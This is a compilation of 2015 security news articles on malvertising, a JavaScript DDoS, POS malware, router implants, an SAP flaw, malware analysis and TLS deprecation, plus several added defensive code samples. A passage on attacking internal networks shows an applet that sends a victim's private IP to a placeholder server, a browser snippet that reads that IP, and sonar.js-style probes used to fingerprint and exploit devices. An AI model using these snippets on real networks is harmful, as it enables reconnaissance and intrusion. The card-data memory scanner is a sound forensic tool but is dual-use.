Month: September 2015

Novel malware dupes victims with fake blue screen of death

Malware creators are hijacking Microsoft Windows’ infamous BSOD in a fresh malvertising campaign.

A new malvertising campaign uses the Blue Screen of Death to scam users into handing over their money and potentially their identity.

Online search engines are used daily by millions of web users. In order to support the vast amounts of requests these search engines receive and process, search engine providers — such as Google, Yahoo and Microsoft — offer advertising platforms and packages for businesses. Users view sponsored links placed high up on a search results page, businesses gain more exposure and the search engine generates revenue.

However, search engine advertising is also ripe for exploitation and is being used by cyberattackers to generate revenue of their own. One of the best-known techniques is setting up malicious domains that deliver malware payloads to victims' machines, resulting in enslaved systems, compromised PCs and data theft. Some attackers also set up fraudulent domains that appear legitimate in order to lure victims into entering their account information.

Unfortunately, many online advertisement schemes run through third-party platforms and sometimes threat actors slip through the net — resulting in fraudulent and malicious links being displayed on legitimate, trustworthy domains.

Now, a new and rather novel campaign has attracted cybersecurity firm Malwarebytes’ attention.

In a blog post on Monday, the team at Malwarebytes revealed their findings on a new malvertising campaign which uses the infamous Microsoft Windows’ Blue Screen of Death (BSOD) as its selling point.

The group uses BSOD to reel in potential victims as a social engineering technique. The security company found attackers bidding on popular phrases through Google’s AdWords advertising space, including the YouTube keyword to display their adverts at the top of the search engine. This link is meant to go to the designated YouTube URL, but instead, clicking on this advert leads to a convincing web page complete with the BSOD image.

While some users will not be fooled, others without much technical knowledge are likely to be.

On the page, users are instructed to call a toll-free “helpline” to resolve the BSOD issue. The scammers are waiting at the other end for these calls, where they pretend to be Windows support and offer their victims expensive and non-existent “support packages” — defrauding users of anything from $199 to $599.

However, this isn't necessarily the end of a painful story. Malwarebytes says innocent PC users may also end up having their identity stolen and their bank accounts rinsed of funds.

In this particular campaign, at least two domains have been registered to redirect users to the fraudulent pages through IP addresses in Arizona.

The campaign was reported to Google and the adverts were immediately pulled, but this is only one such campaign out of thousands of scams appearing online every day.

Source: http://www.zdnet.com/

How to Hack and Exploit the Internal Network and Private IPs?

According to a survey by an IT security company, most people believe that while they browse the Web they are protected by firewalls and by networks isolated behind private NAT IP addresses. With that understanding, we take for granted the security of intranet websites and of the web interfaces of routers, firewalls, printers, IP phones, payroll systems and so on, even though we leave them unpatched. We think they stay safe inside the protected zone and that nothing can connect to them directly from the outside world, right?

Well, not quite. Web browsers can be fully controlled by any web page, which lets that page attack internal network resources, according to ethical hacking training instructors. Without advanced perimeter security solutions, the web browser of every user on a corporate network can be turned into a stepping stone for intruders.

How someone can exploit the internal network

An expert from an IT security company explains the procedure for exploiting the internal network:

  • A victim visits a malicious web page, which takes control of their web browser. The malicious page could be any web page laced with a persistent XSS attack, which hackers are already exploiting for mass malware delivery.
  • When the malware runs, it does so from the perspective of the victim's intranet, which nobody can reach directly from outside. This means the victim's web browser can be instructed to hand over its NAT IP address and to make connections on the internal network on behalf of the attacker.
  • The malware uses the victim's web browser as a launch platform from which it port-scans and fingerprints the web servers on the internal network and checks which perimeter security solutions are deployed.
  • The malware launches attacks against the internal targets, and the compromised information is sent out of the network for collection.

Obtaining a browser's public IP address from the web server is easy, but the internal IP address is a little harder, note ethical hacking training instructors. That is the piece of information needed to begin exploring and exploiting the intranet. To obtain the internal IP, a Java applet is invoked in the browser; that is one simple way to do it. The following code loads MyAddress.class and then opens the URL

http://webserver/dirección_ip.html?nat=XXXX

<APPLET CODE="MyAddress.class">
<PARAM NAME="URL" VALUE="http://webserver/ip_address.html?nat=">
</APPLET>

If the victim's web browser is Mozilla/Firefox, the applet requirement can be skipped and a Java socket invoked directly from JavaScript.

function natIP() {
    var w = window.location;
    var host = w.host;
    var port = w.port || 80;
    // LiveConnect (old Mozilla/Firefox only): open a Java socket back to the
    // serving host and read the local address the OS chose for it, which is
    // the browser's private (NAT) IP address.
    var Socket = (new java.net.Socket(host, port)).getLocalAddress().getHostAddress();
    return Socket;
}

Framework for exploiting the internal network

Sonar

Sonar.js is a framework that uses JavaScript, WebRTC and some onload handlers to detect devices inside a network. sonar.js works by using WebRTC to enumerate live hosts on the internal network. Mike Stevans, an ethical hacking training instructor, explains that after enumerating the internal addresses sonar.js tries to link to static resources such as CSS, images and JavaScript while attaching an onload event handler. If the resource loads successfully and the onload event fires, we know the host serves that resource.

Why is that useful to know? With a list of the resources hosted on a device, we can try to fingerprint the devices and the perimeter security solutions.

How does Sonar work?

When the sonar.js payload is loaded in a modern web browser, the following happens:

  • sonar.js uses WebRTC to enumerate the user's internal IPs
  • sonar.js then tries to find other live hosts on the internal network via WebSockets.
  • Once a live host is found, sonar.js starts trying to fingerprint it by linking to it via

<img src="x"> and <link rel="stylesheet" type="text/css" href="x">

and hooking the onload event. If the resource loads successfully, an event fires that launches the exploit matching the fingerprint results.

Sonar.js works from a database of fingerprints. A fingerprint is simply a list of resources known to exist on a network device that can be linked to and detected through onload. Examples include images, CSS stylesheets and even external JavaScript.

According to experts from an IT security company, by building your own fingerprints you can construct custom exploits that are launched against internal devices once sonar.js detects them. Common exploits include things such as Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS) and so on. The idea is that these vulnerabilities can be used to do things such as change a router's DNS settings, pull files from an internal file server, and more.

Using sonar.js, pentesters can build exploits against internal log servers, routers, printers, VoIP phones and more, note perimeter security experts. Because internal networks are often less closely watched, attacks such as CSRF and XSS can be very powerful for taking over the configuration of a network's internal devices.
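A defensive counterpart to the attacks above, added here as an example and not code from the article or from sonar.js: a request guard for an internal device's HTTP interface that rejects the cross-site requests a malicious page drives through a victim's browser, using the Host header, Fetch Metadata and an Origin/Referer fallback. The host names and the Express-style middleware signature are assumptions.

```javascript
'use strict';

// Addresses under which this device's admin interface may legitimately be
// reached (constructed values). A request for any other Host header did not
// come from a user typing the device's address.
const ALLOWED_HOSTS = new Set(['192.168.1.1', 'router.lan']);
const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Host name part of a Host header or a URL ('192.168.1.1:8080' -> '192.168.1.1');
// null when the value does not parse.
function hostnameOf(value) {
  if (!value) return null;
  try {
    const url = /^[a-z]+:\/\//i.test(value) ? value : 'http://' + value;
    return new URL(url).hostname;
  } catch (e) {
    return null;
  }
}

// req carries { method, headers } with lower-case header names, as Node's http
// module provides them. Returns { allow, reason }.
function checkRequest(req) {
  const h = req.headers || {};
  const method = (req.method || 'GET').toUpperCase();

  // 1. Host allowlist: also blocks DNS-rebinding variants, where an attacker's
  //    domain name is pointed at the internal address after the page loaded.
  const host = hostnameOf(h['host']);
  if (!host || !ALLOWED_HOSTS.has(host)) {
    return { allow: false, reason: 'host not allowed' };
  }

  // 2. Fetch Metadata (sent by current browsers). 'none' is a typed URL or
  //    bookmark; anything other than same-origin is rejected, which also
  //    covers the <img>/<link> probes used for fingerprinting.
  const site = h['sec-fetch-site'];
  if (site !== undefined) {
    if (site === 'same-origin' || site === 'none') {
      return { allow: true, reason: 'same-origin (fetch metadata)' };
    }
    return { allow: false, reason: 'cross-site request (' + site + ')' };
  }

  // 3. Legacy fallback: compare Origin (or Referer) with Host. A state-changing
  //    request carrying neither is rejected; a safe request carrying neither is
  //    allowed because many legitimate clients omit them. Caveat: a page can
  //    suppress Referer, so this branch cannot stop cross-site GET probes.
  const source = hostnameOf(h['origin'] || h['referer']);
  if (source !== null) {
    return source === host
      ? { allow: true, reason: 'origin matches host' }
      : { allow: false, reason: 'origin ' + source + ' does not match host' };
  }
  if (SAFE_METHODS.has(method)) {
    return { allow: true, reason: 'safe method, no origin information' };
  }
  return { allow: false, reason: 'state-changing request without Origin' };
}

// Express-style middleware (assumed (req, res, next) signature; not run here).
function crossSiteGuard(req, res, next) {
  const verdict = checkRequest(req);
  if (!verdict.allow) {
    res.statusCode = 403;
    return res.end('rejected: ' + verdict.reason);
  }
  next();
}
```

Pair this with a CSRF token on state-changing forms; the guard is a first line of defence, not a replacement for per-request tokens.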

Source: http://noticiasseguridad.com/tecnologia/como-hackear-y-explotar-la-red-interna-y-ips-privadas/

JavaScript DDoS Attack Peaks at 275,000 Requests-Per-Second

Two years ago at the Black Hat conference, WhiteHat Security researchers Jeremiah Grossman and Matt Johansen explained how hackers could in theory leverage an online ad network to distribute malicious JavaScript efficiently and quickly.

Depending on how much money the attacker wanted to spend, they could do just about anything from drive-by download attacks, to search engine poisoning to DDoS attacks.

“For a DDoS attack, for mere dollars we could bring down one Apache server very quickly for probably under $10 and hold it down for a long time,” Grossman told Threatpost in 2013. “I don’t know if it has good DDoS protection how much it would cost us, but it probably wouldn’t cost $100. This means that anyone without DDoS protection is susceptible to a $10 attack that could bring them down.”

Using JavaScript to bring down a target has slowly moved out of the theoretical, given the Great Cannon research done earlier this year by Citizen Lab and a JavaScript-based DDoS attack against 8chan that originated in malicious image files hosted on Imgur. CloudFlare on Friday described a voluminous attack against an unnamed customer that it speculates could have been launched using a mobile ad network.

Researcher Marek Majkowski said the flood attacks peaked at 275,000 HTTP requests per second, close to 1.2 billion requests per hour, during a four-hour span. Most of the requests came from mobile browsers based in China.

“There is no way to know for sure why so many mobile devices visited the attack page, but the most plausible distribution vector seems to be an ad network,” Majkowski wrote. “It seems probable that users were served advertisements containing the malicious JavaScript. [These] ads were likely showed in iframes in mobile apps, or mobile browsers to people casually browsing the internet.”

Majkowski said this was not a packet-injection type of attack. Instead, it's likely that users' mobile browsers were served iframes with ads requested from a mobile ad network. The network forwarded the requests to the malicious third parties that won the real-time bidding for the slot. The user was then served a page containing malicious JavaScript that sent a flood of XHR requests against the targeted website, CloudFlare said.

“It seems the biggest difficulty is not in creating the JavaScript — it is in effectively distributing it. Since an efficient distribution vector is crucial in issuing large floods, up until now I haven’t seen many sizable browser-based floods,” Majkowski said. “Attacks like this form a new trend. They present a great danger in the internet — defending against this type of flood is not easy for small website operators.”

Source: https://threatpost.com

iPhone can be Hacked if within Bluetooth Range

It has been reported that a vulnerability in iPhones means a hacker can wirelessly hijack your iPhone if they are within Bluetooth range. Australian security researcher and consultant Mark Dowd revealed that iOS 9 includes a patch for this vulnerability, which he warned Apple about just over a month ago. Tim Erlin, director of security and product management at Tripwire, commented on the flaw.

Tim Erlin, Director of Security and Product Management at Tripwire:

“Vulnerabilities like this one should remind users of the importance of keeping your systems current with security updates. Unfortunately, those who would most benefit from hearing this advice are also the hardest to reach. There’s no doubt that this vulnerability will persist and be exploited on devices that aren’t updated.”

Tripwire is a leading provider of advanced threat, security and compliance solutions that enable enterprises, service providers and government agencies to confidently detect, prevent and respond to cybersecurity threats. Tripwire solutions are based on high-fidelity asset visibility and deep endpoint intelligence combined with business context and enable security automation through enterprise integration. Tripwire's portfolio of enterprise-class security solutions includes configuration and policy management, file integrity monitoring, vulnerability management and log intelligence.

Source: http://www.informationsecuritybuzz.com/

Hilton hotels in credit-card-stealing malware infection scare

Someone has hacked the Hilton’s sales registers, and made off with guests’ credit-card details, it’s claimed. The hotel chain confirmed today it is investigating the alleged breach of its computer security.

Investigative journo Brian Krebs says malware in point-of-sale (POS) terminals is believed to have nicked the card information, some of which is already being used to make fraudulent transactions, we’re told.

Multiple sources have told Krebs that bank staff have traced the misused cards to a common source: the tills at restaurants and gift shops in various Hilton hotels around the US.

It is not clear how many accounts may have been compromised, but the malware was active from April 21 to July 27 of this year, apparently. Visa reportedly issued a security alert on the security breach back in August.

Sales terminals in Doubletree, Embassy Suites, Hampton, and Waldorf Astoria hotels were also compromised, it is claimed.

A Hilton spokesperson told The Register late on Friday afternoon:

Hilton Worldwide is strongly committed to protecting our customers’ credit card information. We have many systems in place and work with some of the top experts in the field to address data security. Unfortunately the possibility of fraudulent credit card activity is all too common for every company in today’s marketplace. We take any potential issue very seriously, and we are looking into this matter.

If Krebs’ sources are on the money, Hilton will be the latest major American chain to suffer a massive credit card security breach as the result of a malware incursion. Criminals typically plant malware on PC-like tills to collect credit card information when a purchase is made, and then siphon off the numbers.

Source: http://www.theregister.co.uk/

Russian firm tasked with cracking Tor throws in towel

The company hired by the Kremlin to gather information on and crack the anonymous browser Tor is now looking to pay more than the contract’s value in legal fees to back out of the agreement, according to Bloomberg.

Last year, Russia’s Interior Ministry offered a contract, then worth approximately $110,000, “to study the possibility of obtaining technical information on users and users’ equipment of Tor anonymous network,” in an attempt to crack the anonymity offered by the network.

A Russian firm tasked with gathering information on Tor users is paying more than the value of the contract to back out of the agreement.

The Central Research Institute of Economics, Informatics, and Control Systems, a state-run maker of helicopters, weapons, and other military and industrial equipment, accepted the contract.

The firm was not able to hack into the browser, according to online Russian news site Meduza.

Documents obtained from a database of state-purchased disclosures revealed the company agreed to pay $150,000 in legal fees to abandon the Tor project and several other classified government contracts, according to the Bloomberg report.

Lawyers from Pleshakov, Ushkalov and Partners are negotiating with Russian officials to help the firm reach a settlement.

Source: http://www.scmagazine.com/

Facebook Following NSA Footsteps to Spy on Users: Belgium’s Privacy Advocate

In June this year, we reported how Facebook was sued by Belgium's Privacy Commission (BPC) for tracking users, even those who never made a profile on the social media site.

Now, Frederic Debussere (representative of the Belgian Privacy Commission/BPC), in his opening arguments on Monday, referred to Edward Snowden, the famous NSA whistleblower who revealed the NSA's mass surveillance program.

He said:

"When it became known that the NSA was spying on people all around the world, everybody was upset. This actor [Facebook] is doing the very same thing, albeit in a different way."

Detailed Analysis:

The BPC accused Facebook of “trampling” over European and Belgian privacy law and brought a lawsuit against the social network.

The details of the alleged breaches from Facebook can be found in a report from the BPC, in which the commission mentioned that Facebook tracked non-users and those who already had logged out from the site for advertising purposes.

Reportedly, the BPC is threatening Facebook with a fine of $250,000 per day for not responding to its demands.

The Cookie Aspect:

Facebook has categorically denied the claims and states that the data and information presented by the BPC in its privacy report are false.

According to an official Facebook spokesperson, the social network is determined to "show the court how this technology protects people from spam, malware, and other attacks, that our practices are consistent with EU law and with those of the most popular Belgian websites," the Guardian reports.

Moreover, Facebook repeatedly has mentioned that all of its operations and practices in European regions are audited and controlled under the Irish data protection agency. The headquarters of Facebook’s European branch is also situated in Dublin, Ireland.

A representative of Facebook, Paul Lefebvre said:

“How could Facebook be subject to Belgian law if the management of data gathering is being done by Facebook Ireland and its 900 employees in that country?”

Belgians need not 'be intimidated' by Facebook:

The whole of Europe is watching the case intently since data privacy regulators throughout the region, even in the Netherlands, have started to point fingers at the privacy practices of Facebook.

Source: https://www.hackread.com

Hack Brief: Mobile Manager’s Security Hole Would Let Hackers Wipe Phones

REMOTE MANAGEMENT SYSTEMS for mobile phones are supposed to make it easy for companies to wipe a device clean if it gets lost or stolen. But a vulnerability discovered in a popular remote management system used by thousands of businesses to manage employee mobile phones would allow an attacker to wipe a CEO’s phone clean, steal the phone’s activity log, or determine the executive’s location, researchers say.

The Hack

The hack involves an authentication bypass vulnerability in SAP AG’s Afaria mobile management system used by more than 6,300 companies. Ordinarily, system administrators send a signed SMS from an Afaria server to lock or unlock a phone, wipe it, request an activity log, block the user, disable the Wi-Fi or obtain location data. But researchers at ERPScan found that the signature is not secure.

The signature uses a SHA256 hash composed from three different values: the mobile device ID, or IMEI; a transmitter ID; and a LastAdminSession value. An attacker can easily obtain the transmitter ID simply by sending a connection request to the Afaria server over the Internet, and the LastAdminSession—a timestamp indicating the last time the phone communicated with the Afaria server—can be a random timestamp. The only thing the hacker needs to direct the attack, then, is someone's phone number and IMEI, or International Mobile Station Equipment Identity. Phone numbers can be obtained from web sites or business cards, and an attacker can determine the IMEI number of devices by sniffing phone traffic at a conference or outside a company's office, using a home-made stingray-like device. Since IMEI numbers are often sequential for corporations that purchase phones in bulk, it's possible for an attacker to guess the IMEIs of other phones belonging to a company simply by knowing one.

Who’s Affected?

Because the vulnerability is in the management system, not a phone’s operating system, it affects all mobile operating systems used with the Afaria server—Windows Phone, Android, iOS, BlackBerry and others. Afaria is considered one of the top mobile device management platforms on the market, and ERPScan estimates that more than 130 million phones would be affected by the vulnerability. The ERPScan researchers presented their findings last week at the Hacker Halted conference in Atlanta, but say many companies who use the Afaria system did not get the message.

SAP AG, a German-based company, has issued a patch for the vulnerability, but Alexander Polyakov, CTO of ERPScan, says his company, which specializes in Systems Applications and Product security, often finds businesses with years-old vulnerabilities unpatched in their SAP systems.

“The administrators usually don’t apply patches especially with SAP [systems] because it can affect usability,” he notes. “So what we see in the real environment is, we see vulnerabilities that were published three years ago but are still in the system [unpatched]. They really need to implement these patches.”

How Severe Is This?

The vulnerability is somewhat similar to the recent Stagefright security hole that hit Android in that both attacks involve sending a text message to a phone. But Stagefright, which would allow an attacker to execute remote code on a phone to steal data from it, affects only Android phones, whereas the SAP Afaria vulnerability affects a broader range of mobile phones and devices. Although wiping data from a phone isn’t catastrophic—if there is a backup from which the phone can be restored—not all employees and businesses back up phone data. And even if phones are backed up, it can take days to restore them if an attacker wipes numerous phones at a company.

The authorization bypass vulnerability wasn’t the only flaw ERPScan researchers discovered in the SAP Afaria system. They also found hard-coded encryption keys as well as a cross-site scripting vulnerability that would allow an attacker to inject malicious code into the Afaria administrative console and potentially use it to deliver malware to employee phones. SAP has patched this flaw as well.

Source: http://www.wired.com/

Malware implants on Cisco routers revealed to be more widespread

Researchers detected 200 Cisco routers with malicious firmware in 31 countries, with the U.S. having the largest number of potentially infected routers.

Attackers have installed malicious firmware on nearly 200 Cisco routers used by businesses from over 30 countries, according to Internet scans performed by cyber crime fighters at the Shadowserver Foundation.

Last Monday, FireEye subsidiary Mandiant warned about new attacks that replace the firmware on integrated services routers from Cisco Systems. The rogue firmware provides attackers with persistent backdoor access and the ability to install custom malware modules.

At the time Mandiant said that it had found 14 routers infected with the backdoor, dubbed SYNful Knock, in four countries: Mexico, Ukraine, India, and the Philippines. The affected models were Cisco 1841, 8211, and 3825, which are no longer being sold by the networking vendor.

Since then, the Shadowserver Foundation, a volunteer organization that tracks cyber crime activities and helps take down botnets, has been running an Internet scan with Cisco’s help in order to identify more potentially compromised devices.

The results confirmed Mandiant’s suspicions: there are more than 14 routers infected with SYNful Knock out there. Shadowserver and Cisco identified 199 unique IP (Internet Protocol) addresses in 31 countries that show signs of compromise with this malware.

The U.S. has the largest number of potentially infected routers, 65. It is followed by India with 12 and Russia with 11.

Shadowserver plans to start notifying network owners who have signed up for the organization’s free alert service if any of the compromised routers fall into their IP blocks.

“It is important to stress the severity of this malicious activity,” the organization said Monday in a blog post. “Compromised routers should be identified and remediated as a top priority.”

By controlling routers, attackers gain the ability to sniff and modify network traffic, redirect users to spoofed websites and launch other attacks against local network devices that would otherwise be inaccessible from the Internet.

Since the devices targeted by the SYNful Knock attackers are typically professional-grade routers used by businesses or ISPs, their compromise could affect large numbers of users.

Cisco has been aware of attackers using rogue firmware implants for several months. The company published a security advisory in August with instructions on how to harden devices against such attacks.

Source: http://www.infoworld.com/

How to Reverse Engineer Malware?

Malicious software can be a virus, worm, Trojan, rootkit, bot, DoS tool, exploit kit or spyware. The goal of malware analysis is to understand how a specific piece of malware works. There are important questions that need answering, such as: how does it infect the machine, and what exactly does the malware do? In this article we will try to understand, with the help of Bill Smith, an IT security solutions expert, the basics of malware analysis and how you can get started doing it.

Who analyzes malware?
There are different kinds of people and organizations that do malware analysis. They all fall into these categories:
• CSIRTs
• Security product developers
• Security service providers
• Anti-virus researchers
• Software developers
• Government security agencies

Why is there a need to analyze malware?
The following are the reasons behind malware analysis:
• To have a response procedure for hacking incidents.
• To develop and improve products such as anti-virus.
• To create signatures for protection against malware.
• To build countermeasures.
• To analyze and resolve vulnerabilities.
• To track down and catch the criminals who write the malware.

Malware analysis methods
According to IT security training experts, to do malware analysis you have to follow these steps:

1. Environment setup
Set up a controlled machine that is not connected to the network; you must also be able to restore this machine to a clean state at any time.

2. Malware collection
To set up the environment you first need to download the malware file and then change its file extension. Following the advice of ethical hacking course experts, after downloading the file you can copy it to a protected disk, as this can help isolate the malware in some cases.

3. Surface analysis
Gather surface information about the malware file without executing it. The purpose of surface analysis is to obtain:
• Hash value
• File type
• Strings
• Anti-virus scan results

4. Runtime analysis
In this step you can run the malware and observe its behaviour. You can use various automated or manual analysis methods, and you can use observation tools in the sandbox system for your analysis. The whole environment can be a dedicated or isolated native OS or a virtual system, explains Mike Stevens, IT security training expert.

5. Static analysis
In static analysis you must read the code in the binary file and understand how it works. You will need knowledge of the operating system, basic assembly language, efficient reading techniques and anti-analysis techniques. If the binary is packed you will have to unpack it. To understand the binary you will also need to decompile it or disassemble and debug it.

You can use the following tools for static analysis:

Disassembler
IDA (Interactive DisAssembler): disassembles more than 50 architectures

Decompiler
Hex-Rays Decompiler: x86/ARM binary to C code.
VB Decompiler: Visual Basic binary to Visual Basic source code.
.NET Reflector: .NET binary to .NET source code.

Debugger
OllyDbg: very well-known x86 debugger
Immunity Debugger: x86 debugger with Python scripting

To understand the code, you can start with the Windows APIs in the MSDN Library and learn what each API does. You can also check what the arguments and conditions do. While using a disassembler, you can read, rename and comment instructions to understand the code. You can learn more about disassemblers in the ethical hacking training course.

6. Encoding (obfuscation) in malware
Sometimes the malware author obfuscates the code to make it hard for you to analyze it.
The file name, registry entry name and server address stored in the binary are encoded as strings. HTTP data packets can also be encoded using different methods. Some of the encoding methods are
• xor (exclusive or)
• ror/rol (rotate right/left)
• base64
• RC4
• AES
Also, all malware these days uses a C&C server (command and control server) to obtain commands and to return results and data. Hackers can create C&C servers using hacked servers, websites or email accounts. Twitter and Facebook accounts can also be used as C&C servers so that we cannot track them. You can learn how to create a C&C server using social media accounts during iicybersecurity's IT security training.

7. Preventing malware analysis at runtime
Some kinds of malware are smart enough to detect analysis activity and therefore contain logic to evade analysis by malware analysts, explains an IT security solutions expert. Some of the techniques used to detect malware analysis are:

Debugger: to check for debuggers, the malware looks for breakpoints and exception handling.
Virtual machine: to check for a virtual machine, the malware looks at the interface, CPU behaviour and support tools (such as VirtualBox).
Analysis tools: to check for malware analysis tools such as IDA Pro, the malware looks at window names and module names.

Malware can sometimes also check the computer name, disk size and cursor position to evade malware analysis. After detecting that it is being analyzed, it does something different or does nothing at all.
We will cover malware analysis in more depth in the next article with the help of Mike Stevens, ethical hacking training instructor.

Google Details Plans to Disable SSLv3 and RC4

Posted on

As expected, Google formally announced its intent to move away from the stream cipher RC4 and the SSLv3 protocol this week, citing a long history of weaknesses in both.

Adam Langley, a security engineer for the company, announced the plans through a blog post on Thursday. While there isn’t a concrete timeline, Langley insisted that Google is looking to do away with support for RC4 and SSLv3 in all of its frontend servers, Chrome, Android, webcrawlers, and SMTP servers, in the medium term.

The fact that the company is looking to cut ties with both shouldn’t come as a surprise.

The Internet Engineering Task Force condemned SSLv3 in an Internet Standards Track document over the summer, calling it “not sufficiently secure,” adding that “any version of TLS is more secure than SSLv3.”

As Langley notes in the blog, RC4 is 28 years old, and while it fared well in the early going, it’s been the target of multiple attacks over the years, including some that can lead to TLS session compromise and cookie decryption.


As part of the switch Google also announced a collection of minimum standards for TLS clients going forward. According to the post, Google will eventually require the following of devices:

  • TLS 1.2 must be supported.
  • A Server Name Indication (SNI) extension must be included in the handshake and must contain the domain that’s being connected to.
  • The cipher suite TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 must be supported with P-256 and uncompressed points.
  • At least the certificates in https://pki.google.com/roots.pem must be trusted.
  • Certificate handling must be able to support DNS Subject Alternative Names and those SANs may include a single wildcard as the left-most label in the name.
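The five requirements can be checked against a TLS client configuration without touching the network. The Python below is an added example written for this article, not code from Google or from the post: it builds a client context with Python's standard `ssl` module that refuses anything below TLS 1.2 and offers only the named ECDHE-RSA-AES128-GCM suite on P-256, then drives the handshake into a memory buffer to capture the ClientHello and confirm that the SNI extension carries the host name and that the advertised client version is TLS 1.2 (3, 3). It assumes the system trust store in place of `roots.pem` so that it runs offline; the `load_verify_locations` call for that file is noted in a comment.

```python
import ssl
import struct

# OpenSSL's name for TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
REQUIRED_SUITE = "ECDHE-RSA-AES128-GCM-SHA256"


def make_client_context() -> ssl.SSLContext:
    """Client context meeting the minimums listed above (added example)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # verifies certs and host names by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2   # no SSLv3, TLS 1.0 or TLS 1.1
    ctx.set_ciphers(REQUIRED_SUITE)                # RC4 and other legacy suites are never offered
    if hasattr(ctx, "set_ecdh_curve"):
        ctx.set_ecdh_curve("prime256v1")           # P-256
    # Assumption: with the real roots file you would call
    # ctx.load_verify_locations("roots.pem") (from https://pki.google.com/roots.pem);
    # the system store is used here so the example runs offline.
    ctx.load_default_certs()
    return ctx


def negotiable_cipher_names(ctx: ssl.SSLContext) -> list:
    """Names of the cipher suites the context will offer."""
    return [c["name"] for c in ctx.get_ciphers()]


def client_hello(ctx: ssl.SSLContext, hostname: str) -> bytes:
    """Run the handshake into memory BIOs just far enough to capture the ClientHello.
    The server_hostname argument is what puts the SNI extension into the hello."""
    incoming, outgoing = ssl.MemoryBIO(), ssl.MemoryBIO()
    tls = ctx.wrap_bio(incoming, outgoing, server_side=False, server_hostname=hostname)
    try:
        tls.do_handshake()
    except ssl.SSLWantReadError:
        pass  # expected: the client wrote its hello and is now waiting for the server
    return outgoing.read()


def hello_client_version(hello: bytes) -> tuple:
    """(major, minor) from the ClientHello: 5-byte record header, 4-byte handshake
    header, then client_version. TLS 1.2 and TLS 1.3 clients both send (3, 3)."""
    if hello[0] != 0x16 or hello[5] != 0x01:
        raise ValueError("not a ClientHello record")
    return struct.unpack("!BB", hello[9:11])


def check_minimums(hostname: str = "example.com") -> dict:
    """Summarise how the context measures up against the listed requirements."""
    ctx = make_client_context()
    names = negotiable_cipher_names(ctx)
    hello = client_hello(ctx, hostname)
    return {
        "offers_required_suite": REQUIRED_SUITE in names,
        "offers_rc4": any("RC4" in n for n in names),
        "sni_in_hello": hostname.encode() in hello,
        "client_version": hello_client_version(hello),
    }


if __name__ == "__main__":
    for key, value in check_minimums().items():
        print(f"{key}: {value}")
```

On an OpenSSL build that still ships RC4, the difference between this context and a weak one is only the `set_ciphers` string and `minimum_version`; a server-side audit is the mirror image, reading the offered suites out of the captured ClientHello instead of building one.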

Langley notes that devices that don’t meet the requirements won’t stop working anytime soon, but acknowledges they may be affected by TLS changes later down the line, up to the year 2020.

“If your TLS client, webserver or email server requires the use of SSLv3 or RC4 then the time to update was some years ago, but better late than never. However, note that just because you might be using RC4 today doesn’t mean that your client or website will stop working: TLS can negotiate cipher suites and problems will only occur if you don’t support anything but RC4,” Langley wrote.

Langley announced cursory plans to deprecate RC4 earlier this month in a post to the security@chromium.org mailing list, confirming that the cipher would be disabled in a future Chrome build, likely reaching the stable channel around January or February 2016.

The company has already taken one step towards nixing SSLv3: a month after last fall’s POODLE attack it did away with support for the fallback to SSLv3 in Chrome, a move that went hand in hand with the company’s phasing out of the SHA-1 cryptographic hash algorithm.

Source:https://threatpost.com

MWZLesson POS Trojan borrows code from other malware

Posted on

Security experts at Doctor Web have discovered a new PoS Trojan dubbed MWZLesson that borrows code from other popular malicious software.

Security experts at Dr. Web have discovered a new PoS Trojan that was designed by mixing code from other malware.

The new PoS Trojan, dubbed Trojan.MWZLesson, was designed reusing the code of other popular malware, including the Dexter PoS and the Neutrino backdoor.

“This code was borrowed from another Trojan designed for POS terminals and named Trojan.PWS.Dexter. The malware sends all acquired bank card data and other intercepted information to the command and control server.” states the blog post published by Dr. Web.


Like its predecessors, MWZLesson compromises POS terminals by scraping RAM in search of credit card data. Once it has infected the PoS system, the malware communicates with its server over HTTP: it steals card data and sends it to the command and control server through GET and POST requests.

“Trojan.MWZLesson can intercept GET and POST requests sent from the infected machine’s browsers (Firefox, Chrome or Internet Explorer). Such requests are forwarded to the command and control server run by cybercriminals,” continues the post.
Trojan.MWZLesson can update itself, download and run additional files, find specific documents, and even mount an HTTP Flood attack.

The experts at Dr.Web discovered that Trojan.MWZLesson also implements features to avoid detection and to eradicate other malware that has infected the PoS system.

“Trojan.MWZLesson checks for virtual environments and debuggers and gather information on the infected machine. The newly discovered PoS malware is able to remove other malware present on the machine and is able to exfiltrate different kinds of data.”

The discovery of Trojan.MWZLesson confirms the great interest of criminal crews in infecting POS terminals and their ability to recycle code from older, effective malware.
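RAM scraping works because Track 2 data passes through the POS process in clear text; the same pattern is what an incident responder searches a memory image for when scoping a PoS compromise. The Python below is an added example written for this page (not Dr. Web's code and not derived from the Trojan): it scans a constructed buffer for ISO 7813 Track 2 records, discards digit runs that fail the Luhn check, and reports hits with the PAN masked so the report itself does not re-expose card data. The buffer and the test PAN are constructed; 4111111111111111 is a well-known Luhn-valid test number.

```python
import re

# Track 2 as it sits in PoS memory: ';' PAN '=' YYMM service-code discretionary '?'
# (ISO 7813). The PAN is 13 to 19 digits.
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d*)\?")


def luhn_ok(pan: str) -> bool:
    """Luhn checksum; weeds out digit runs that merely look like a PAN."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep the first 6 and last 4 digits; a scoping report must not carry full PANs."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track2(buf: bytes) -> list:
    """Return (offset, masked PAN, expiry) for every Luhn-valid Track 2 record in buf."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        if luhn_ok(pan):
            yy, mm = m.group(2).decode(), m.group(3).decode()
            hits.append((m.start(), mask(pan), f"20{yy}-{mm}"))
    return hits


# Constructed memory buffer: one Luhn-valid test PAN, one digit run that fails Luhn,
# surrounded by unrelated bytes of the kind found around a process heap.
SAMPLE_DUMP = (
    b"\x00\x00ProcessData\x00"
    b";4111111111111111=25121010000000000000?"
    b"\x00\x01\x02junk"
    b";4111111111111112=25121010000000000000?"
    b"\xff\xff"
)

if __name__ == "__main__":
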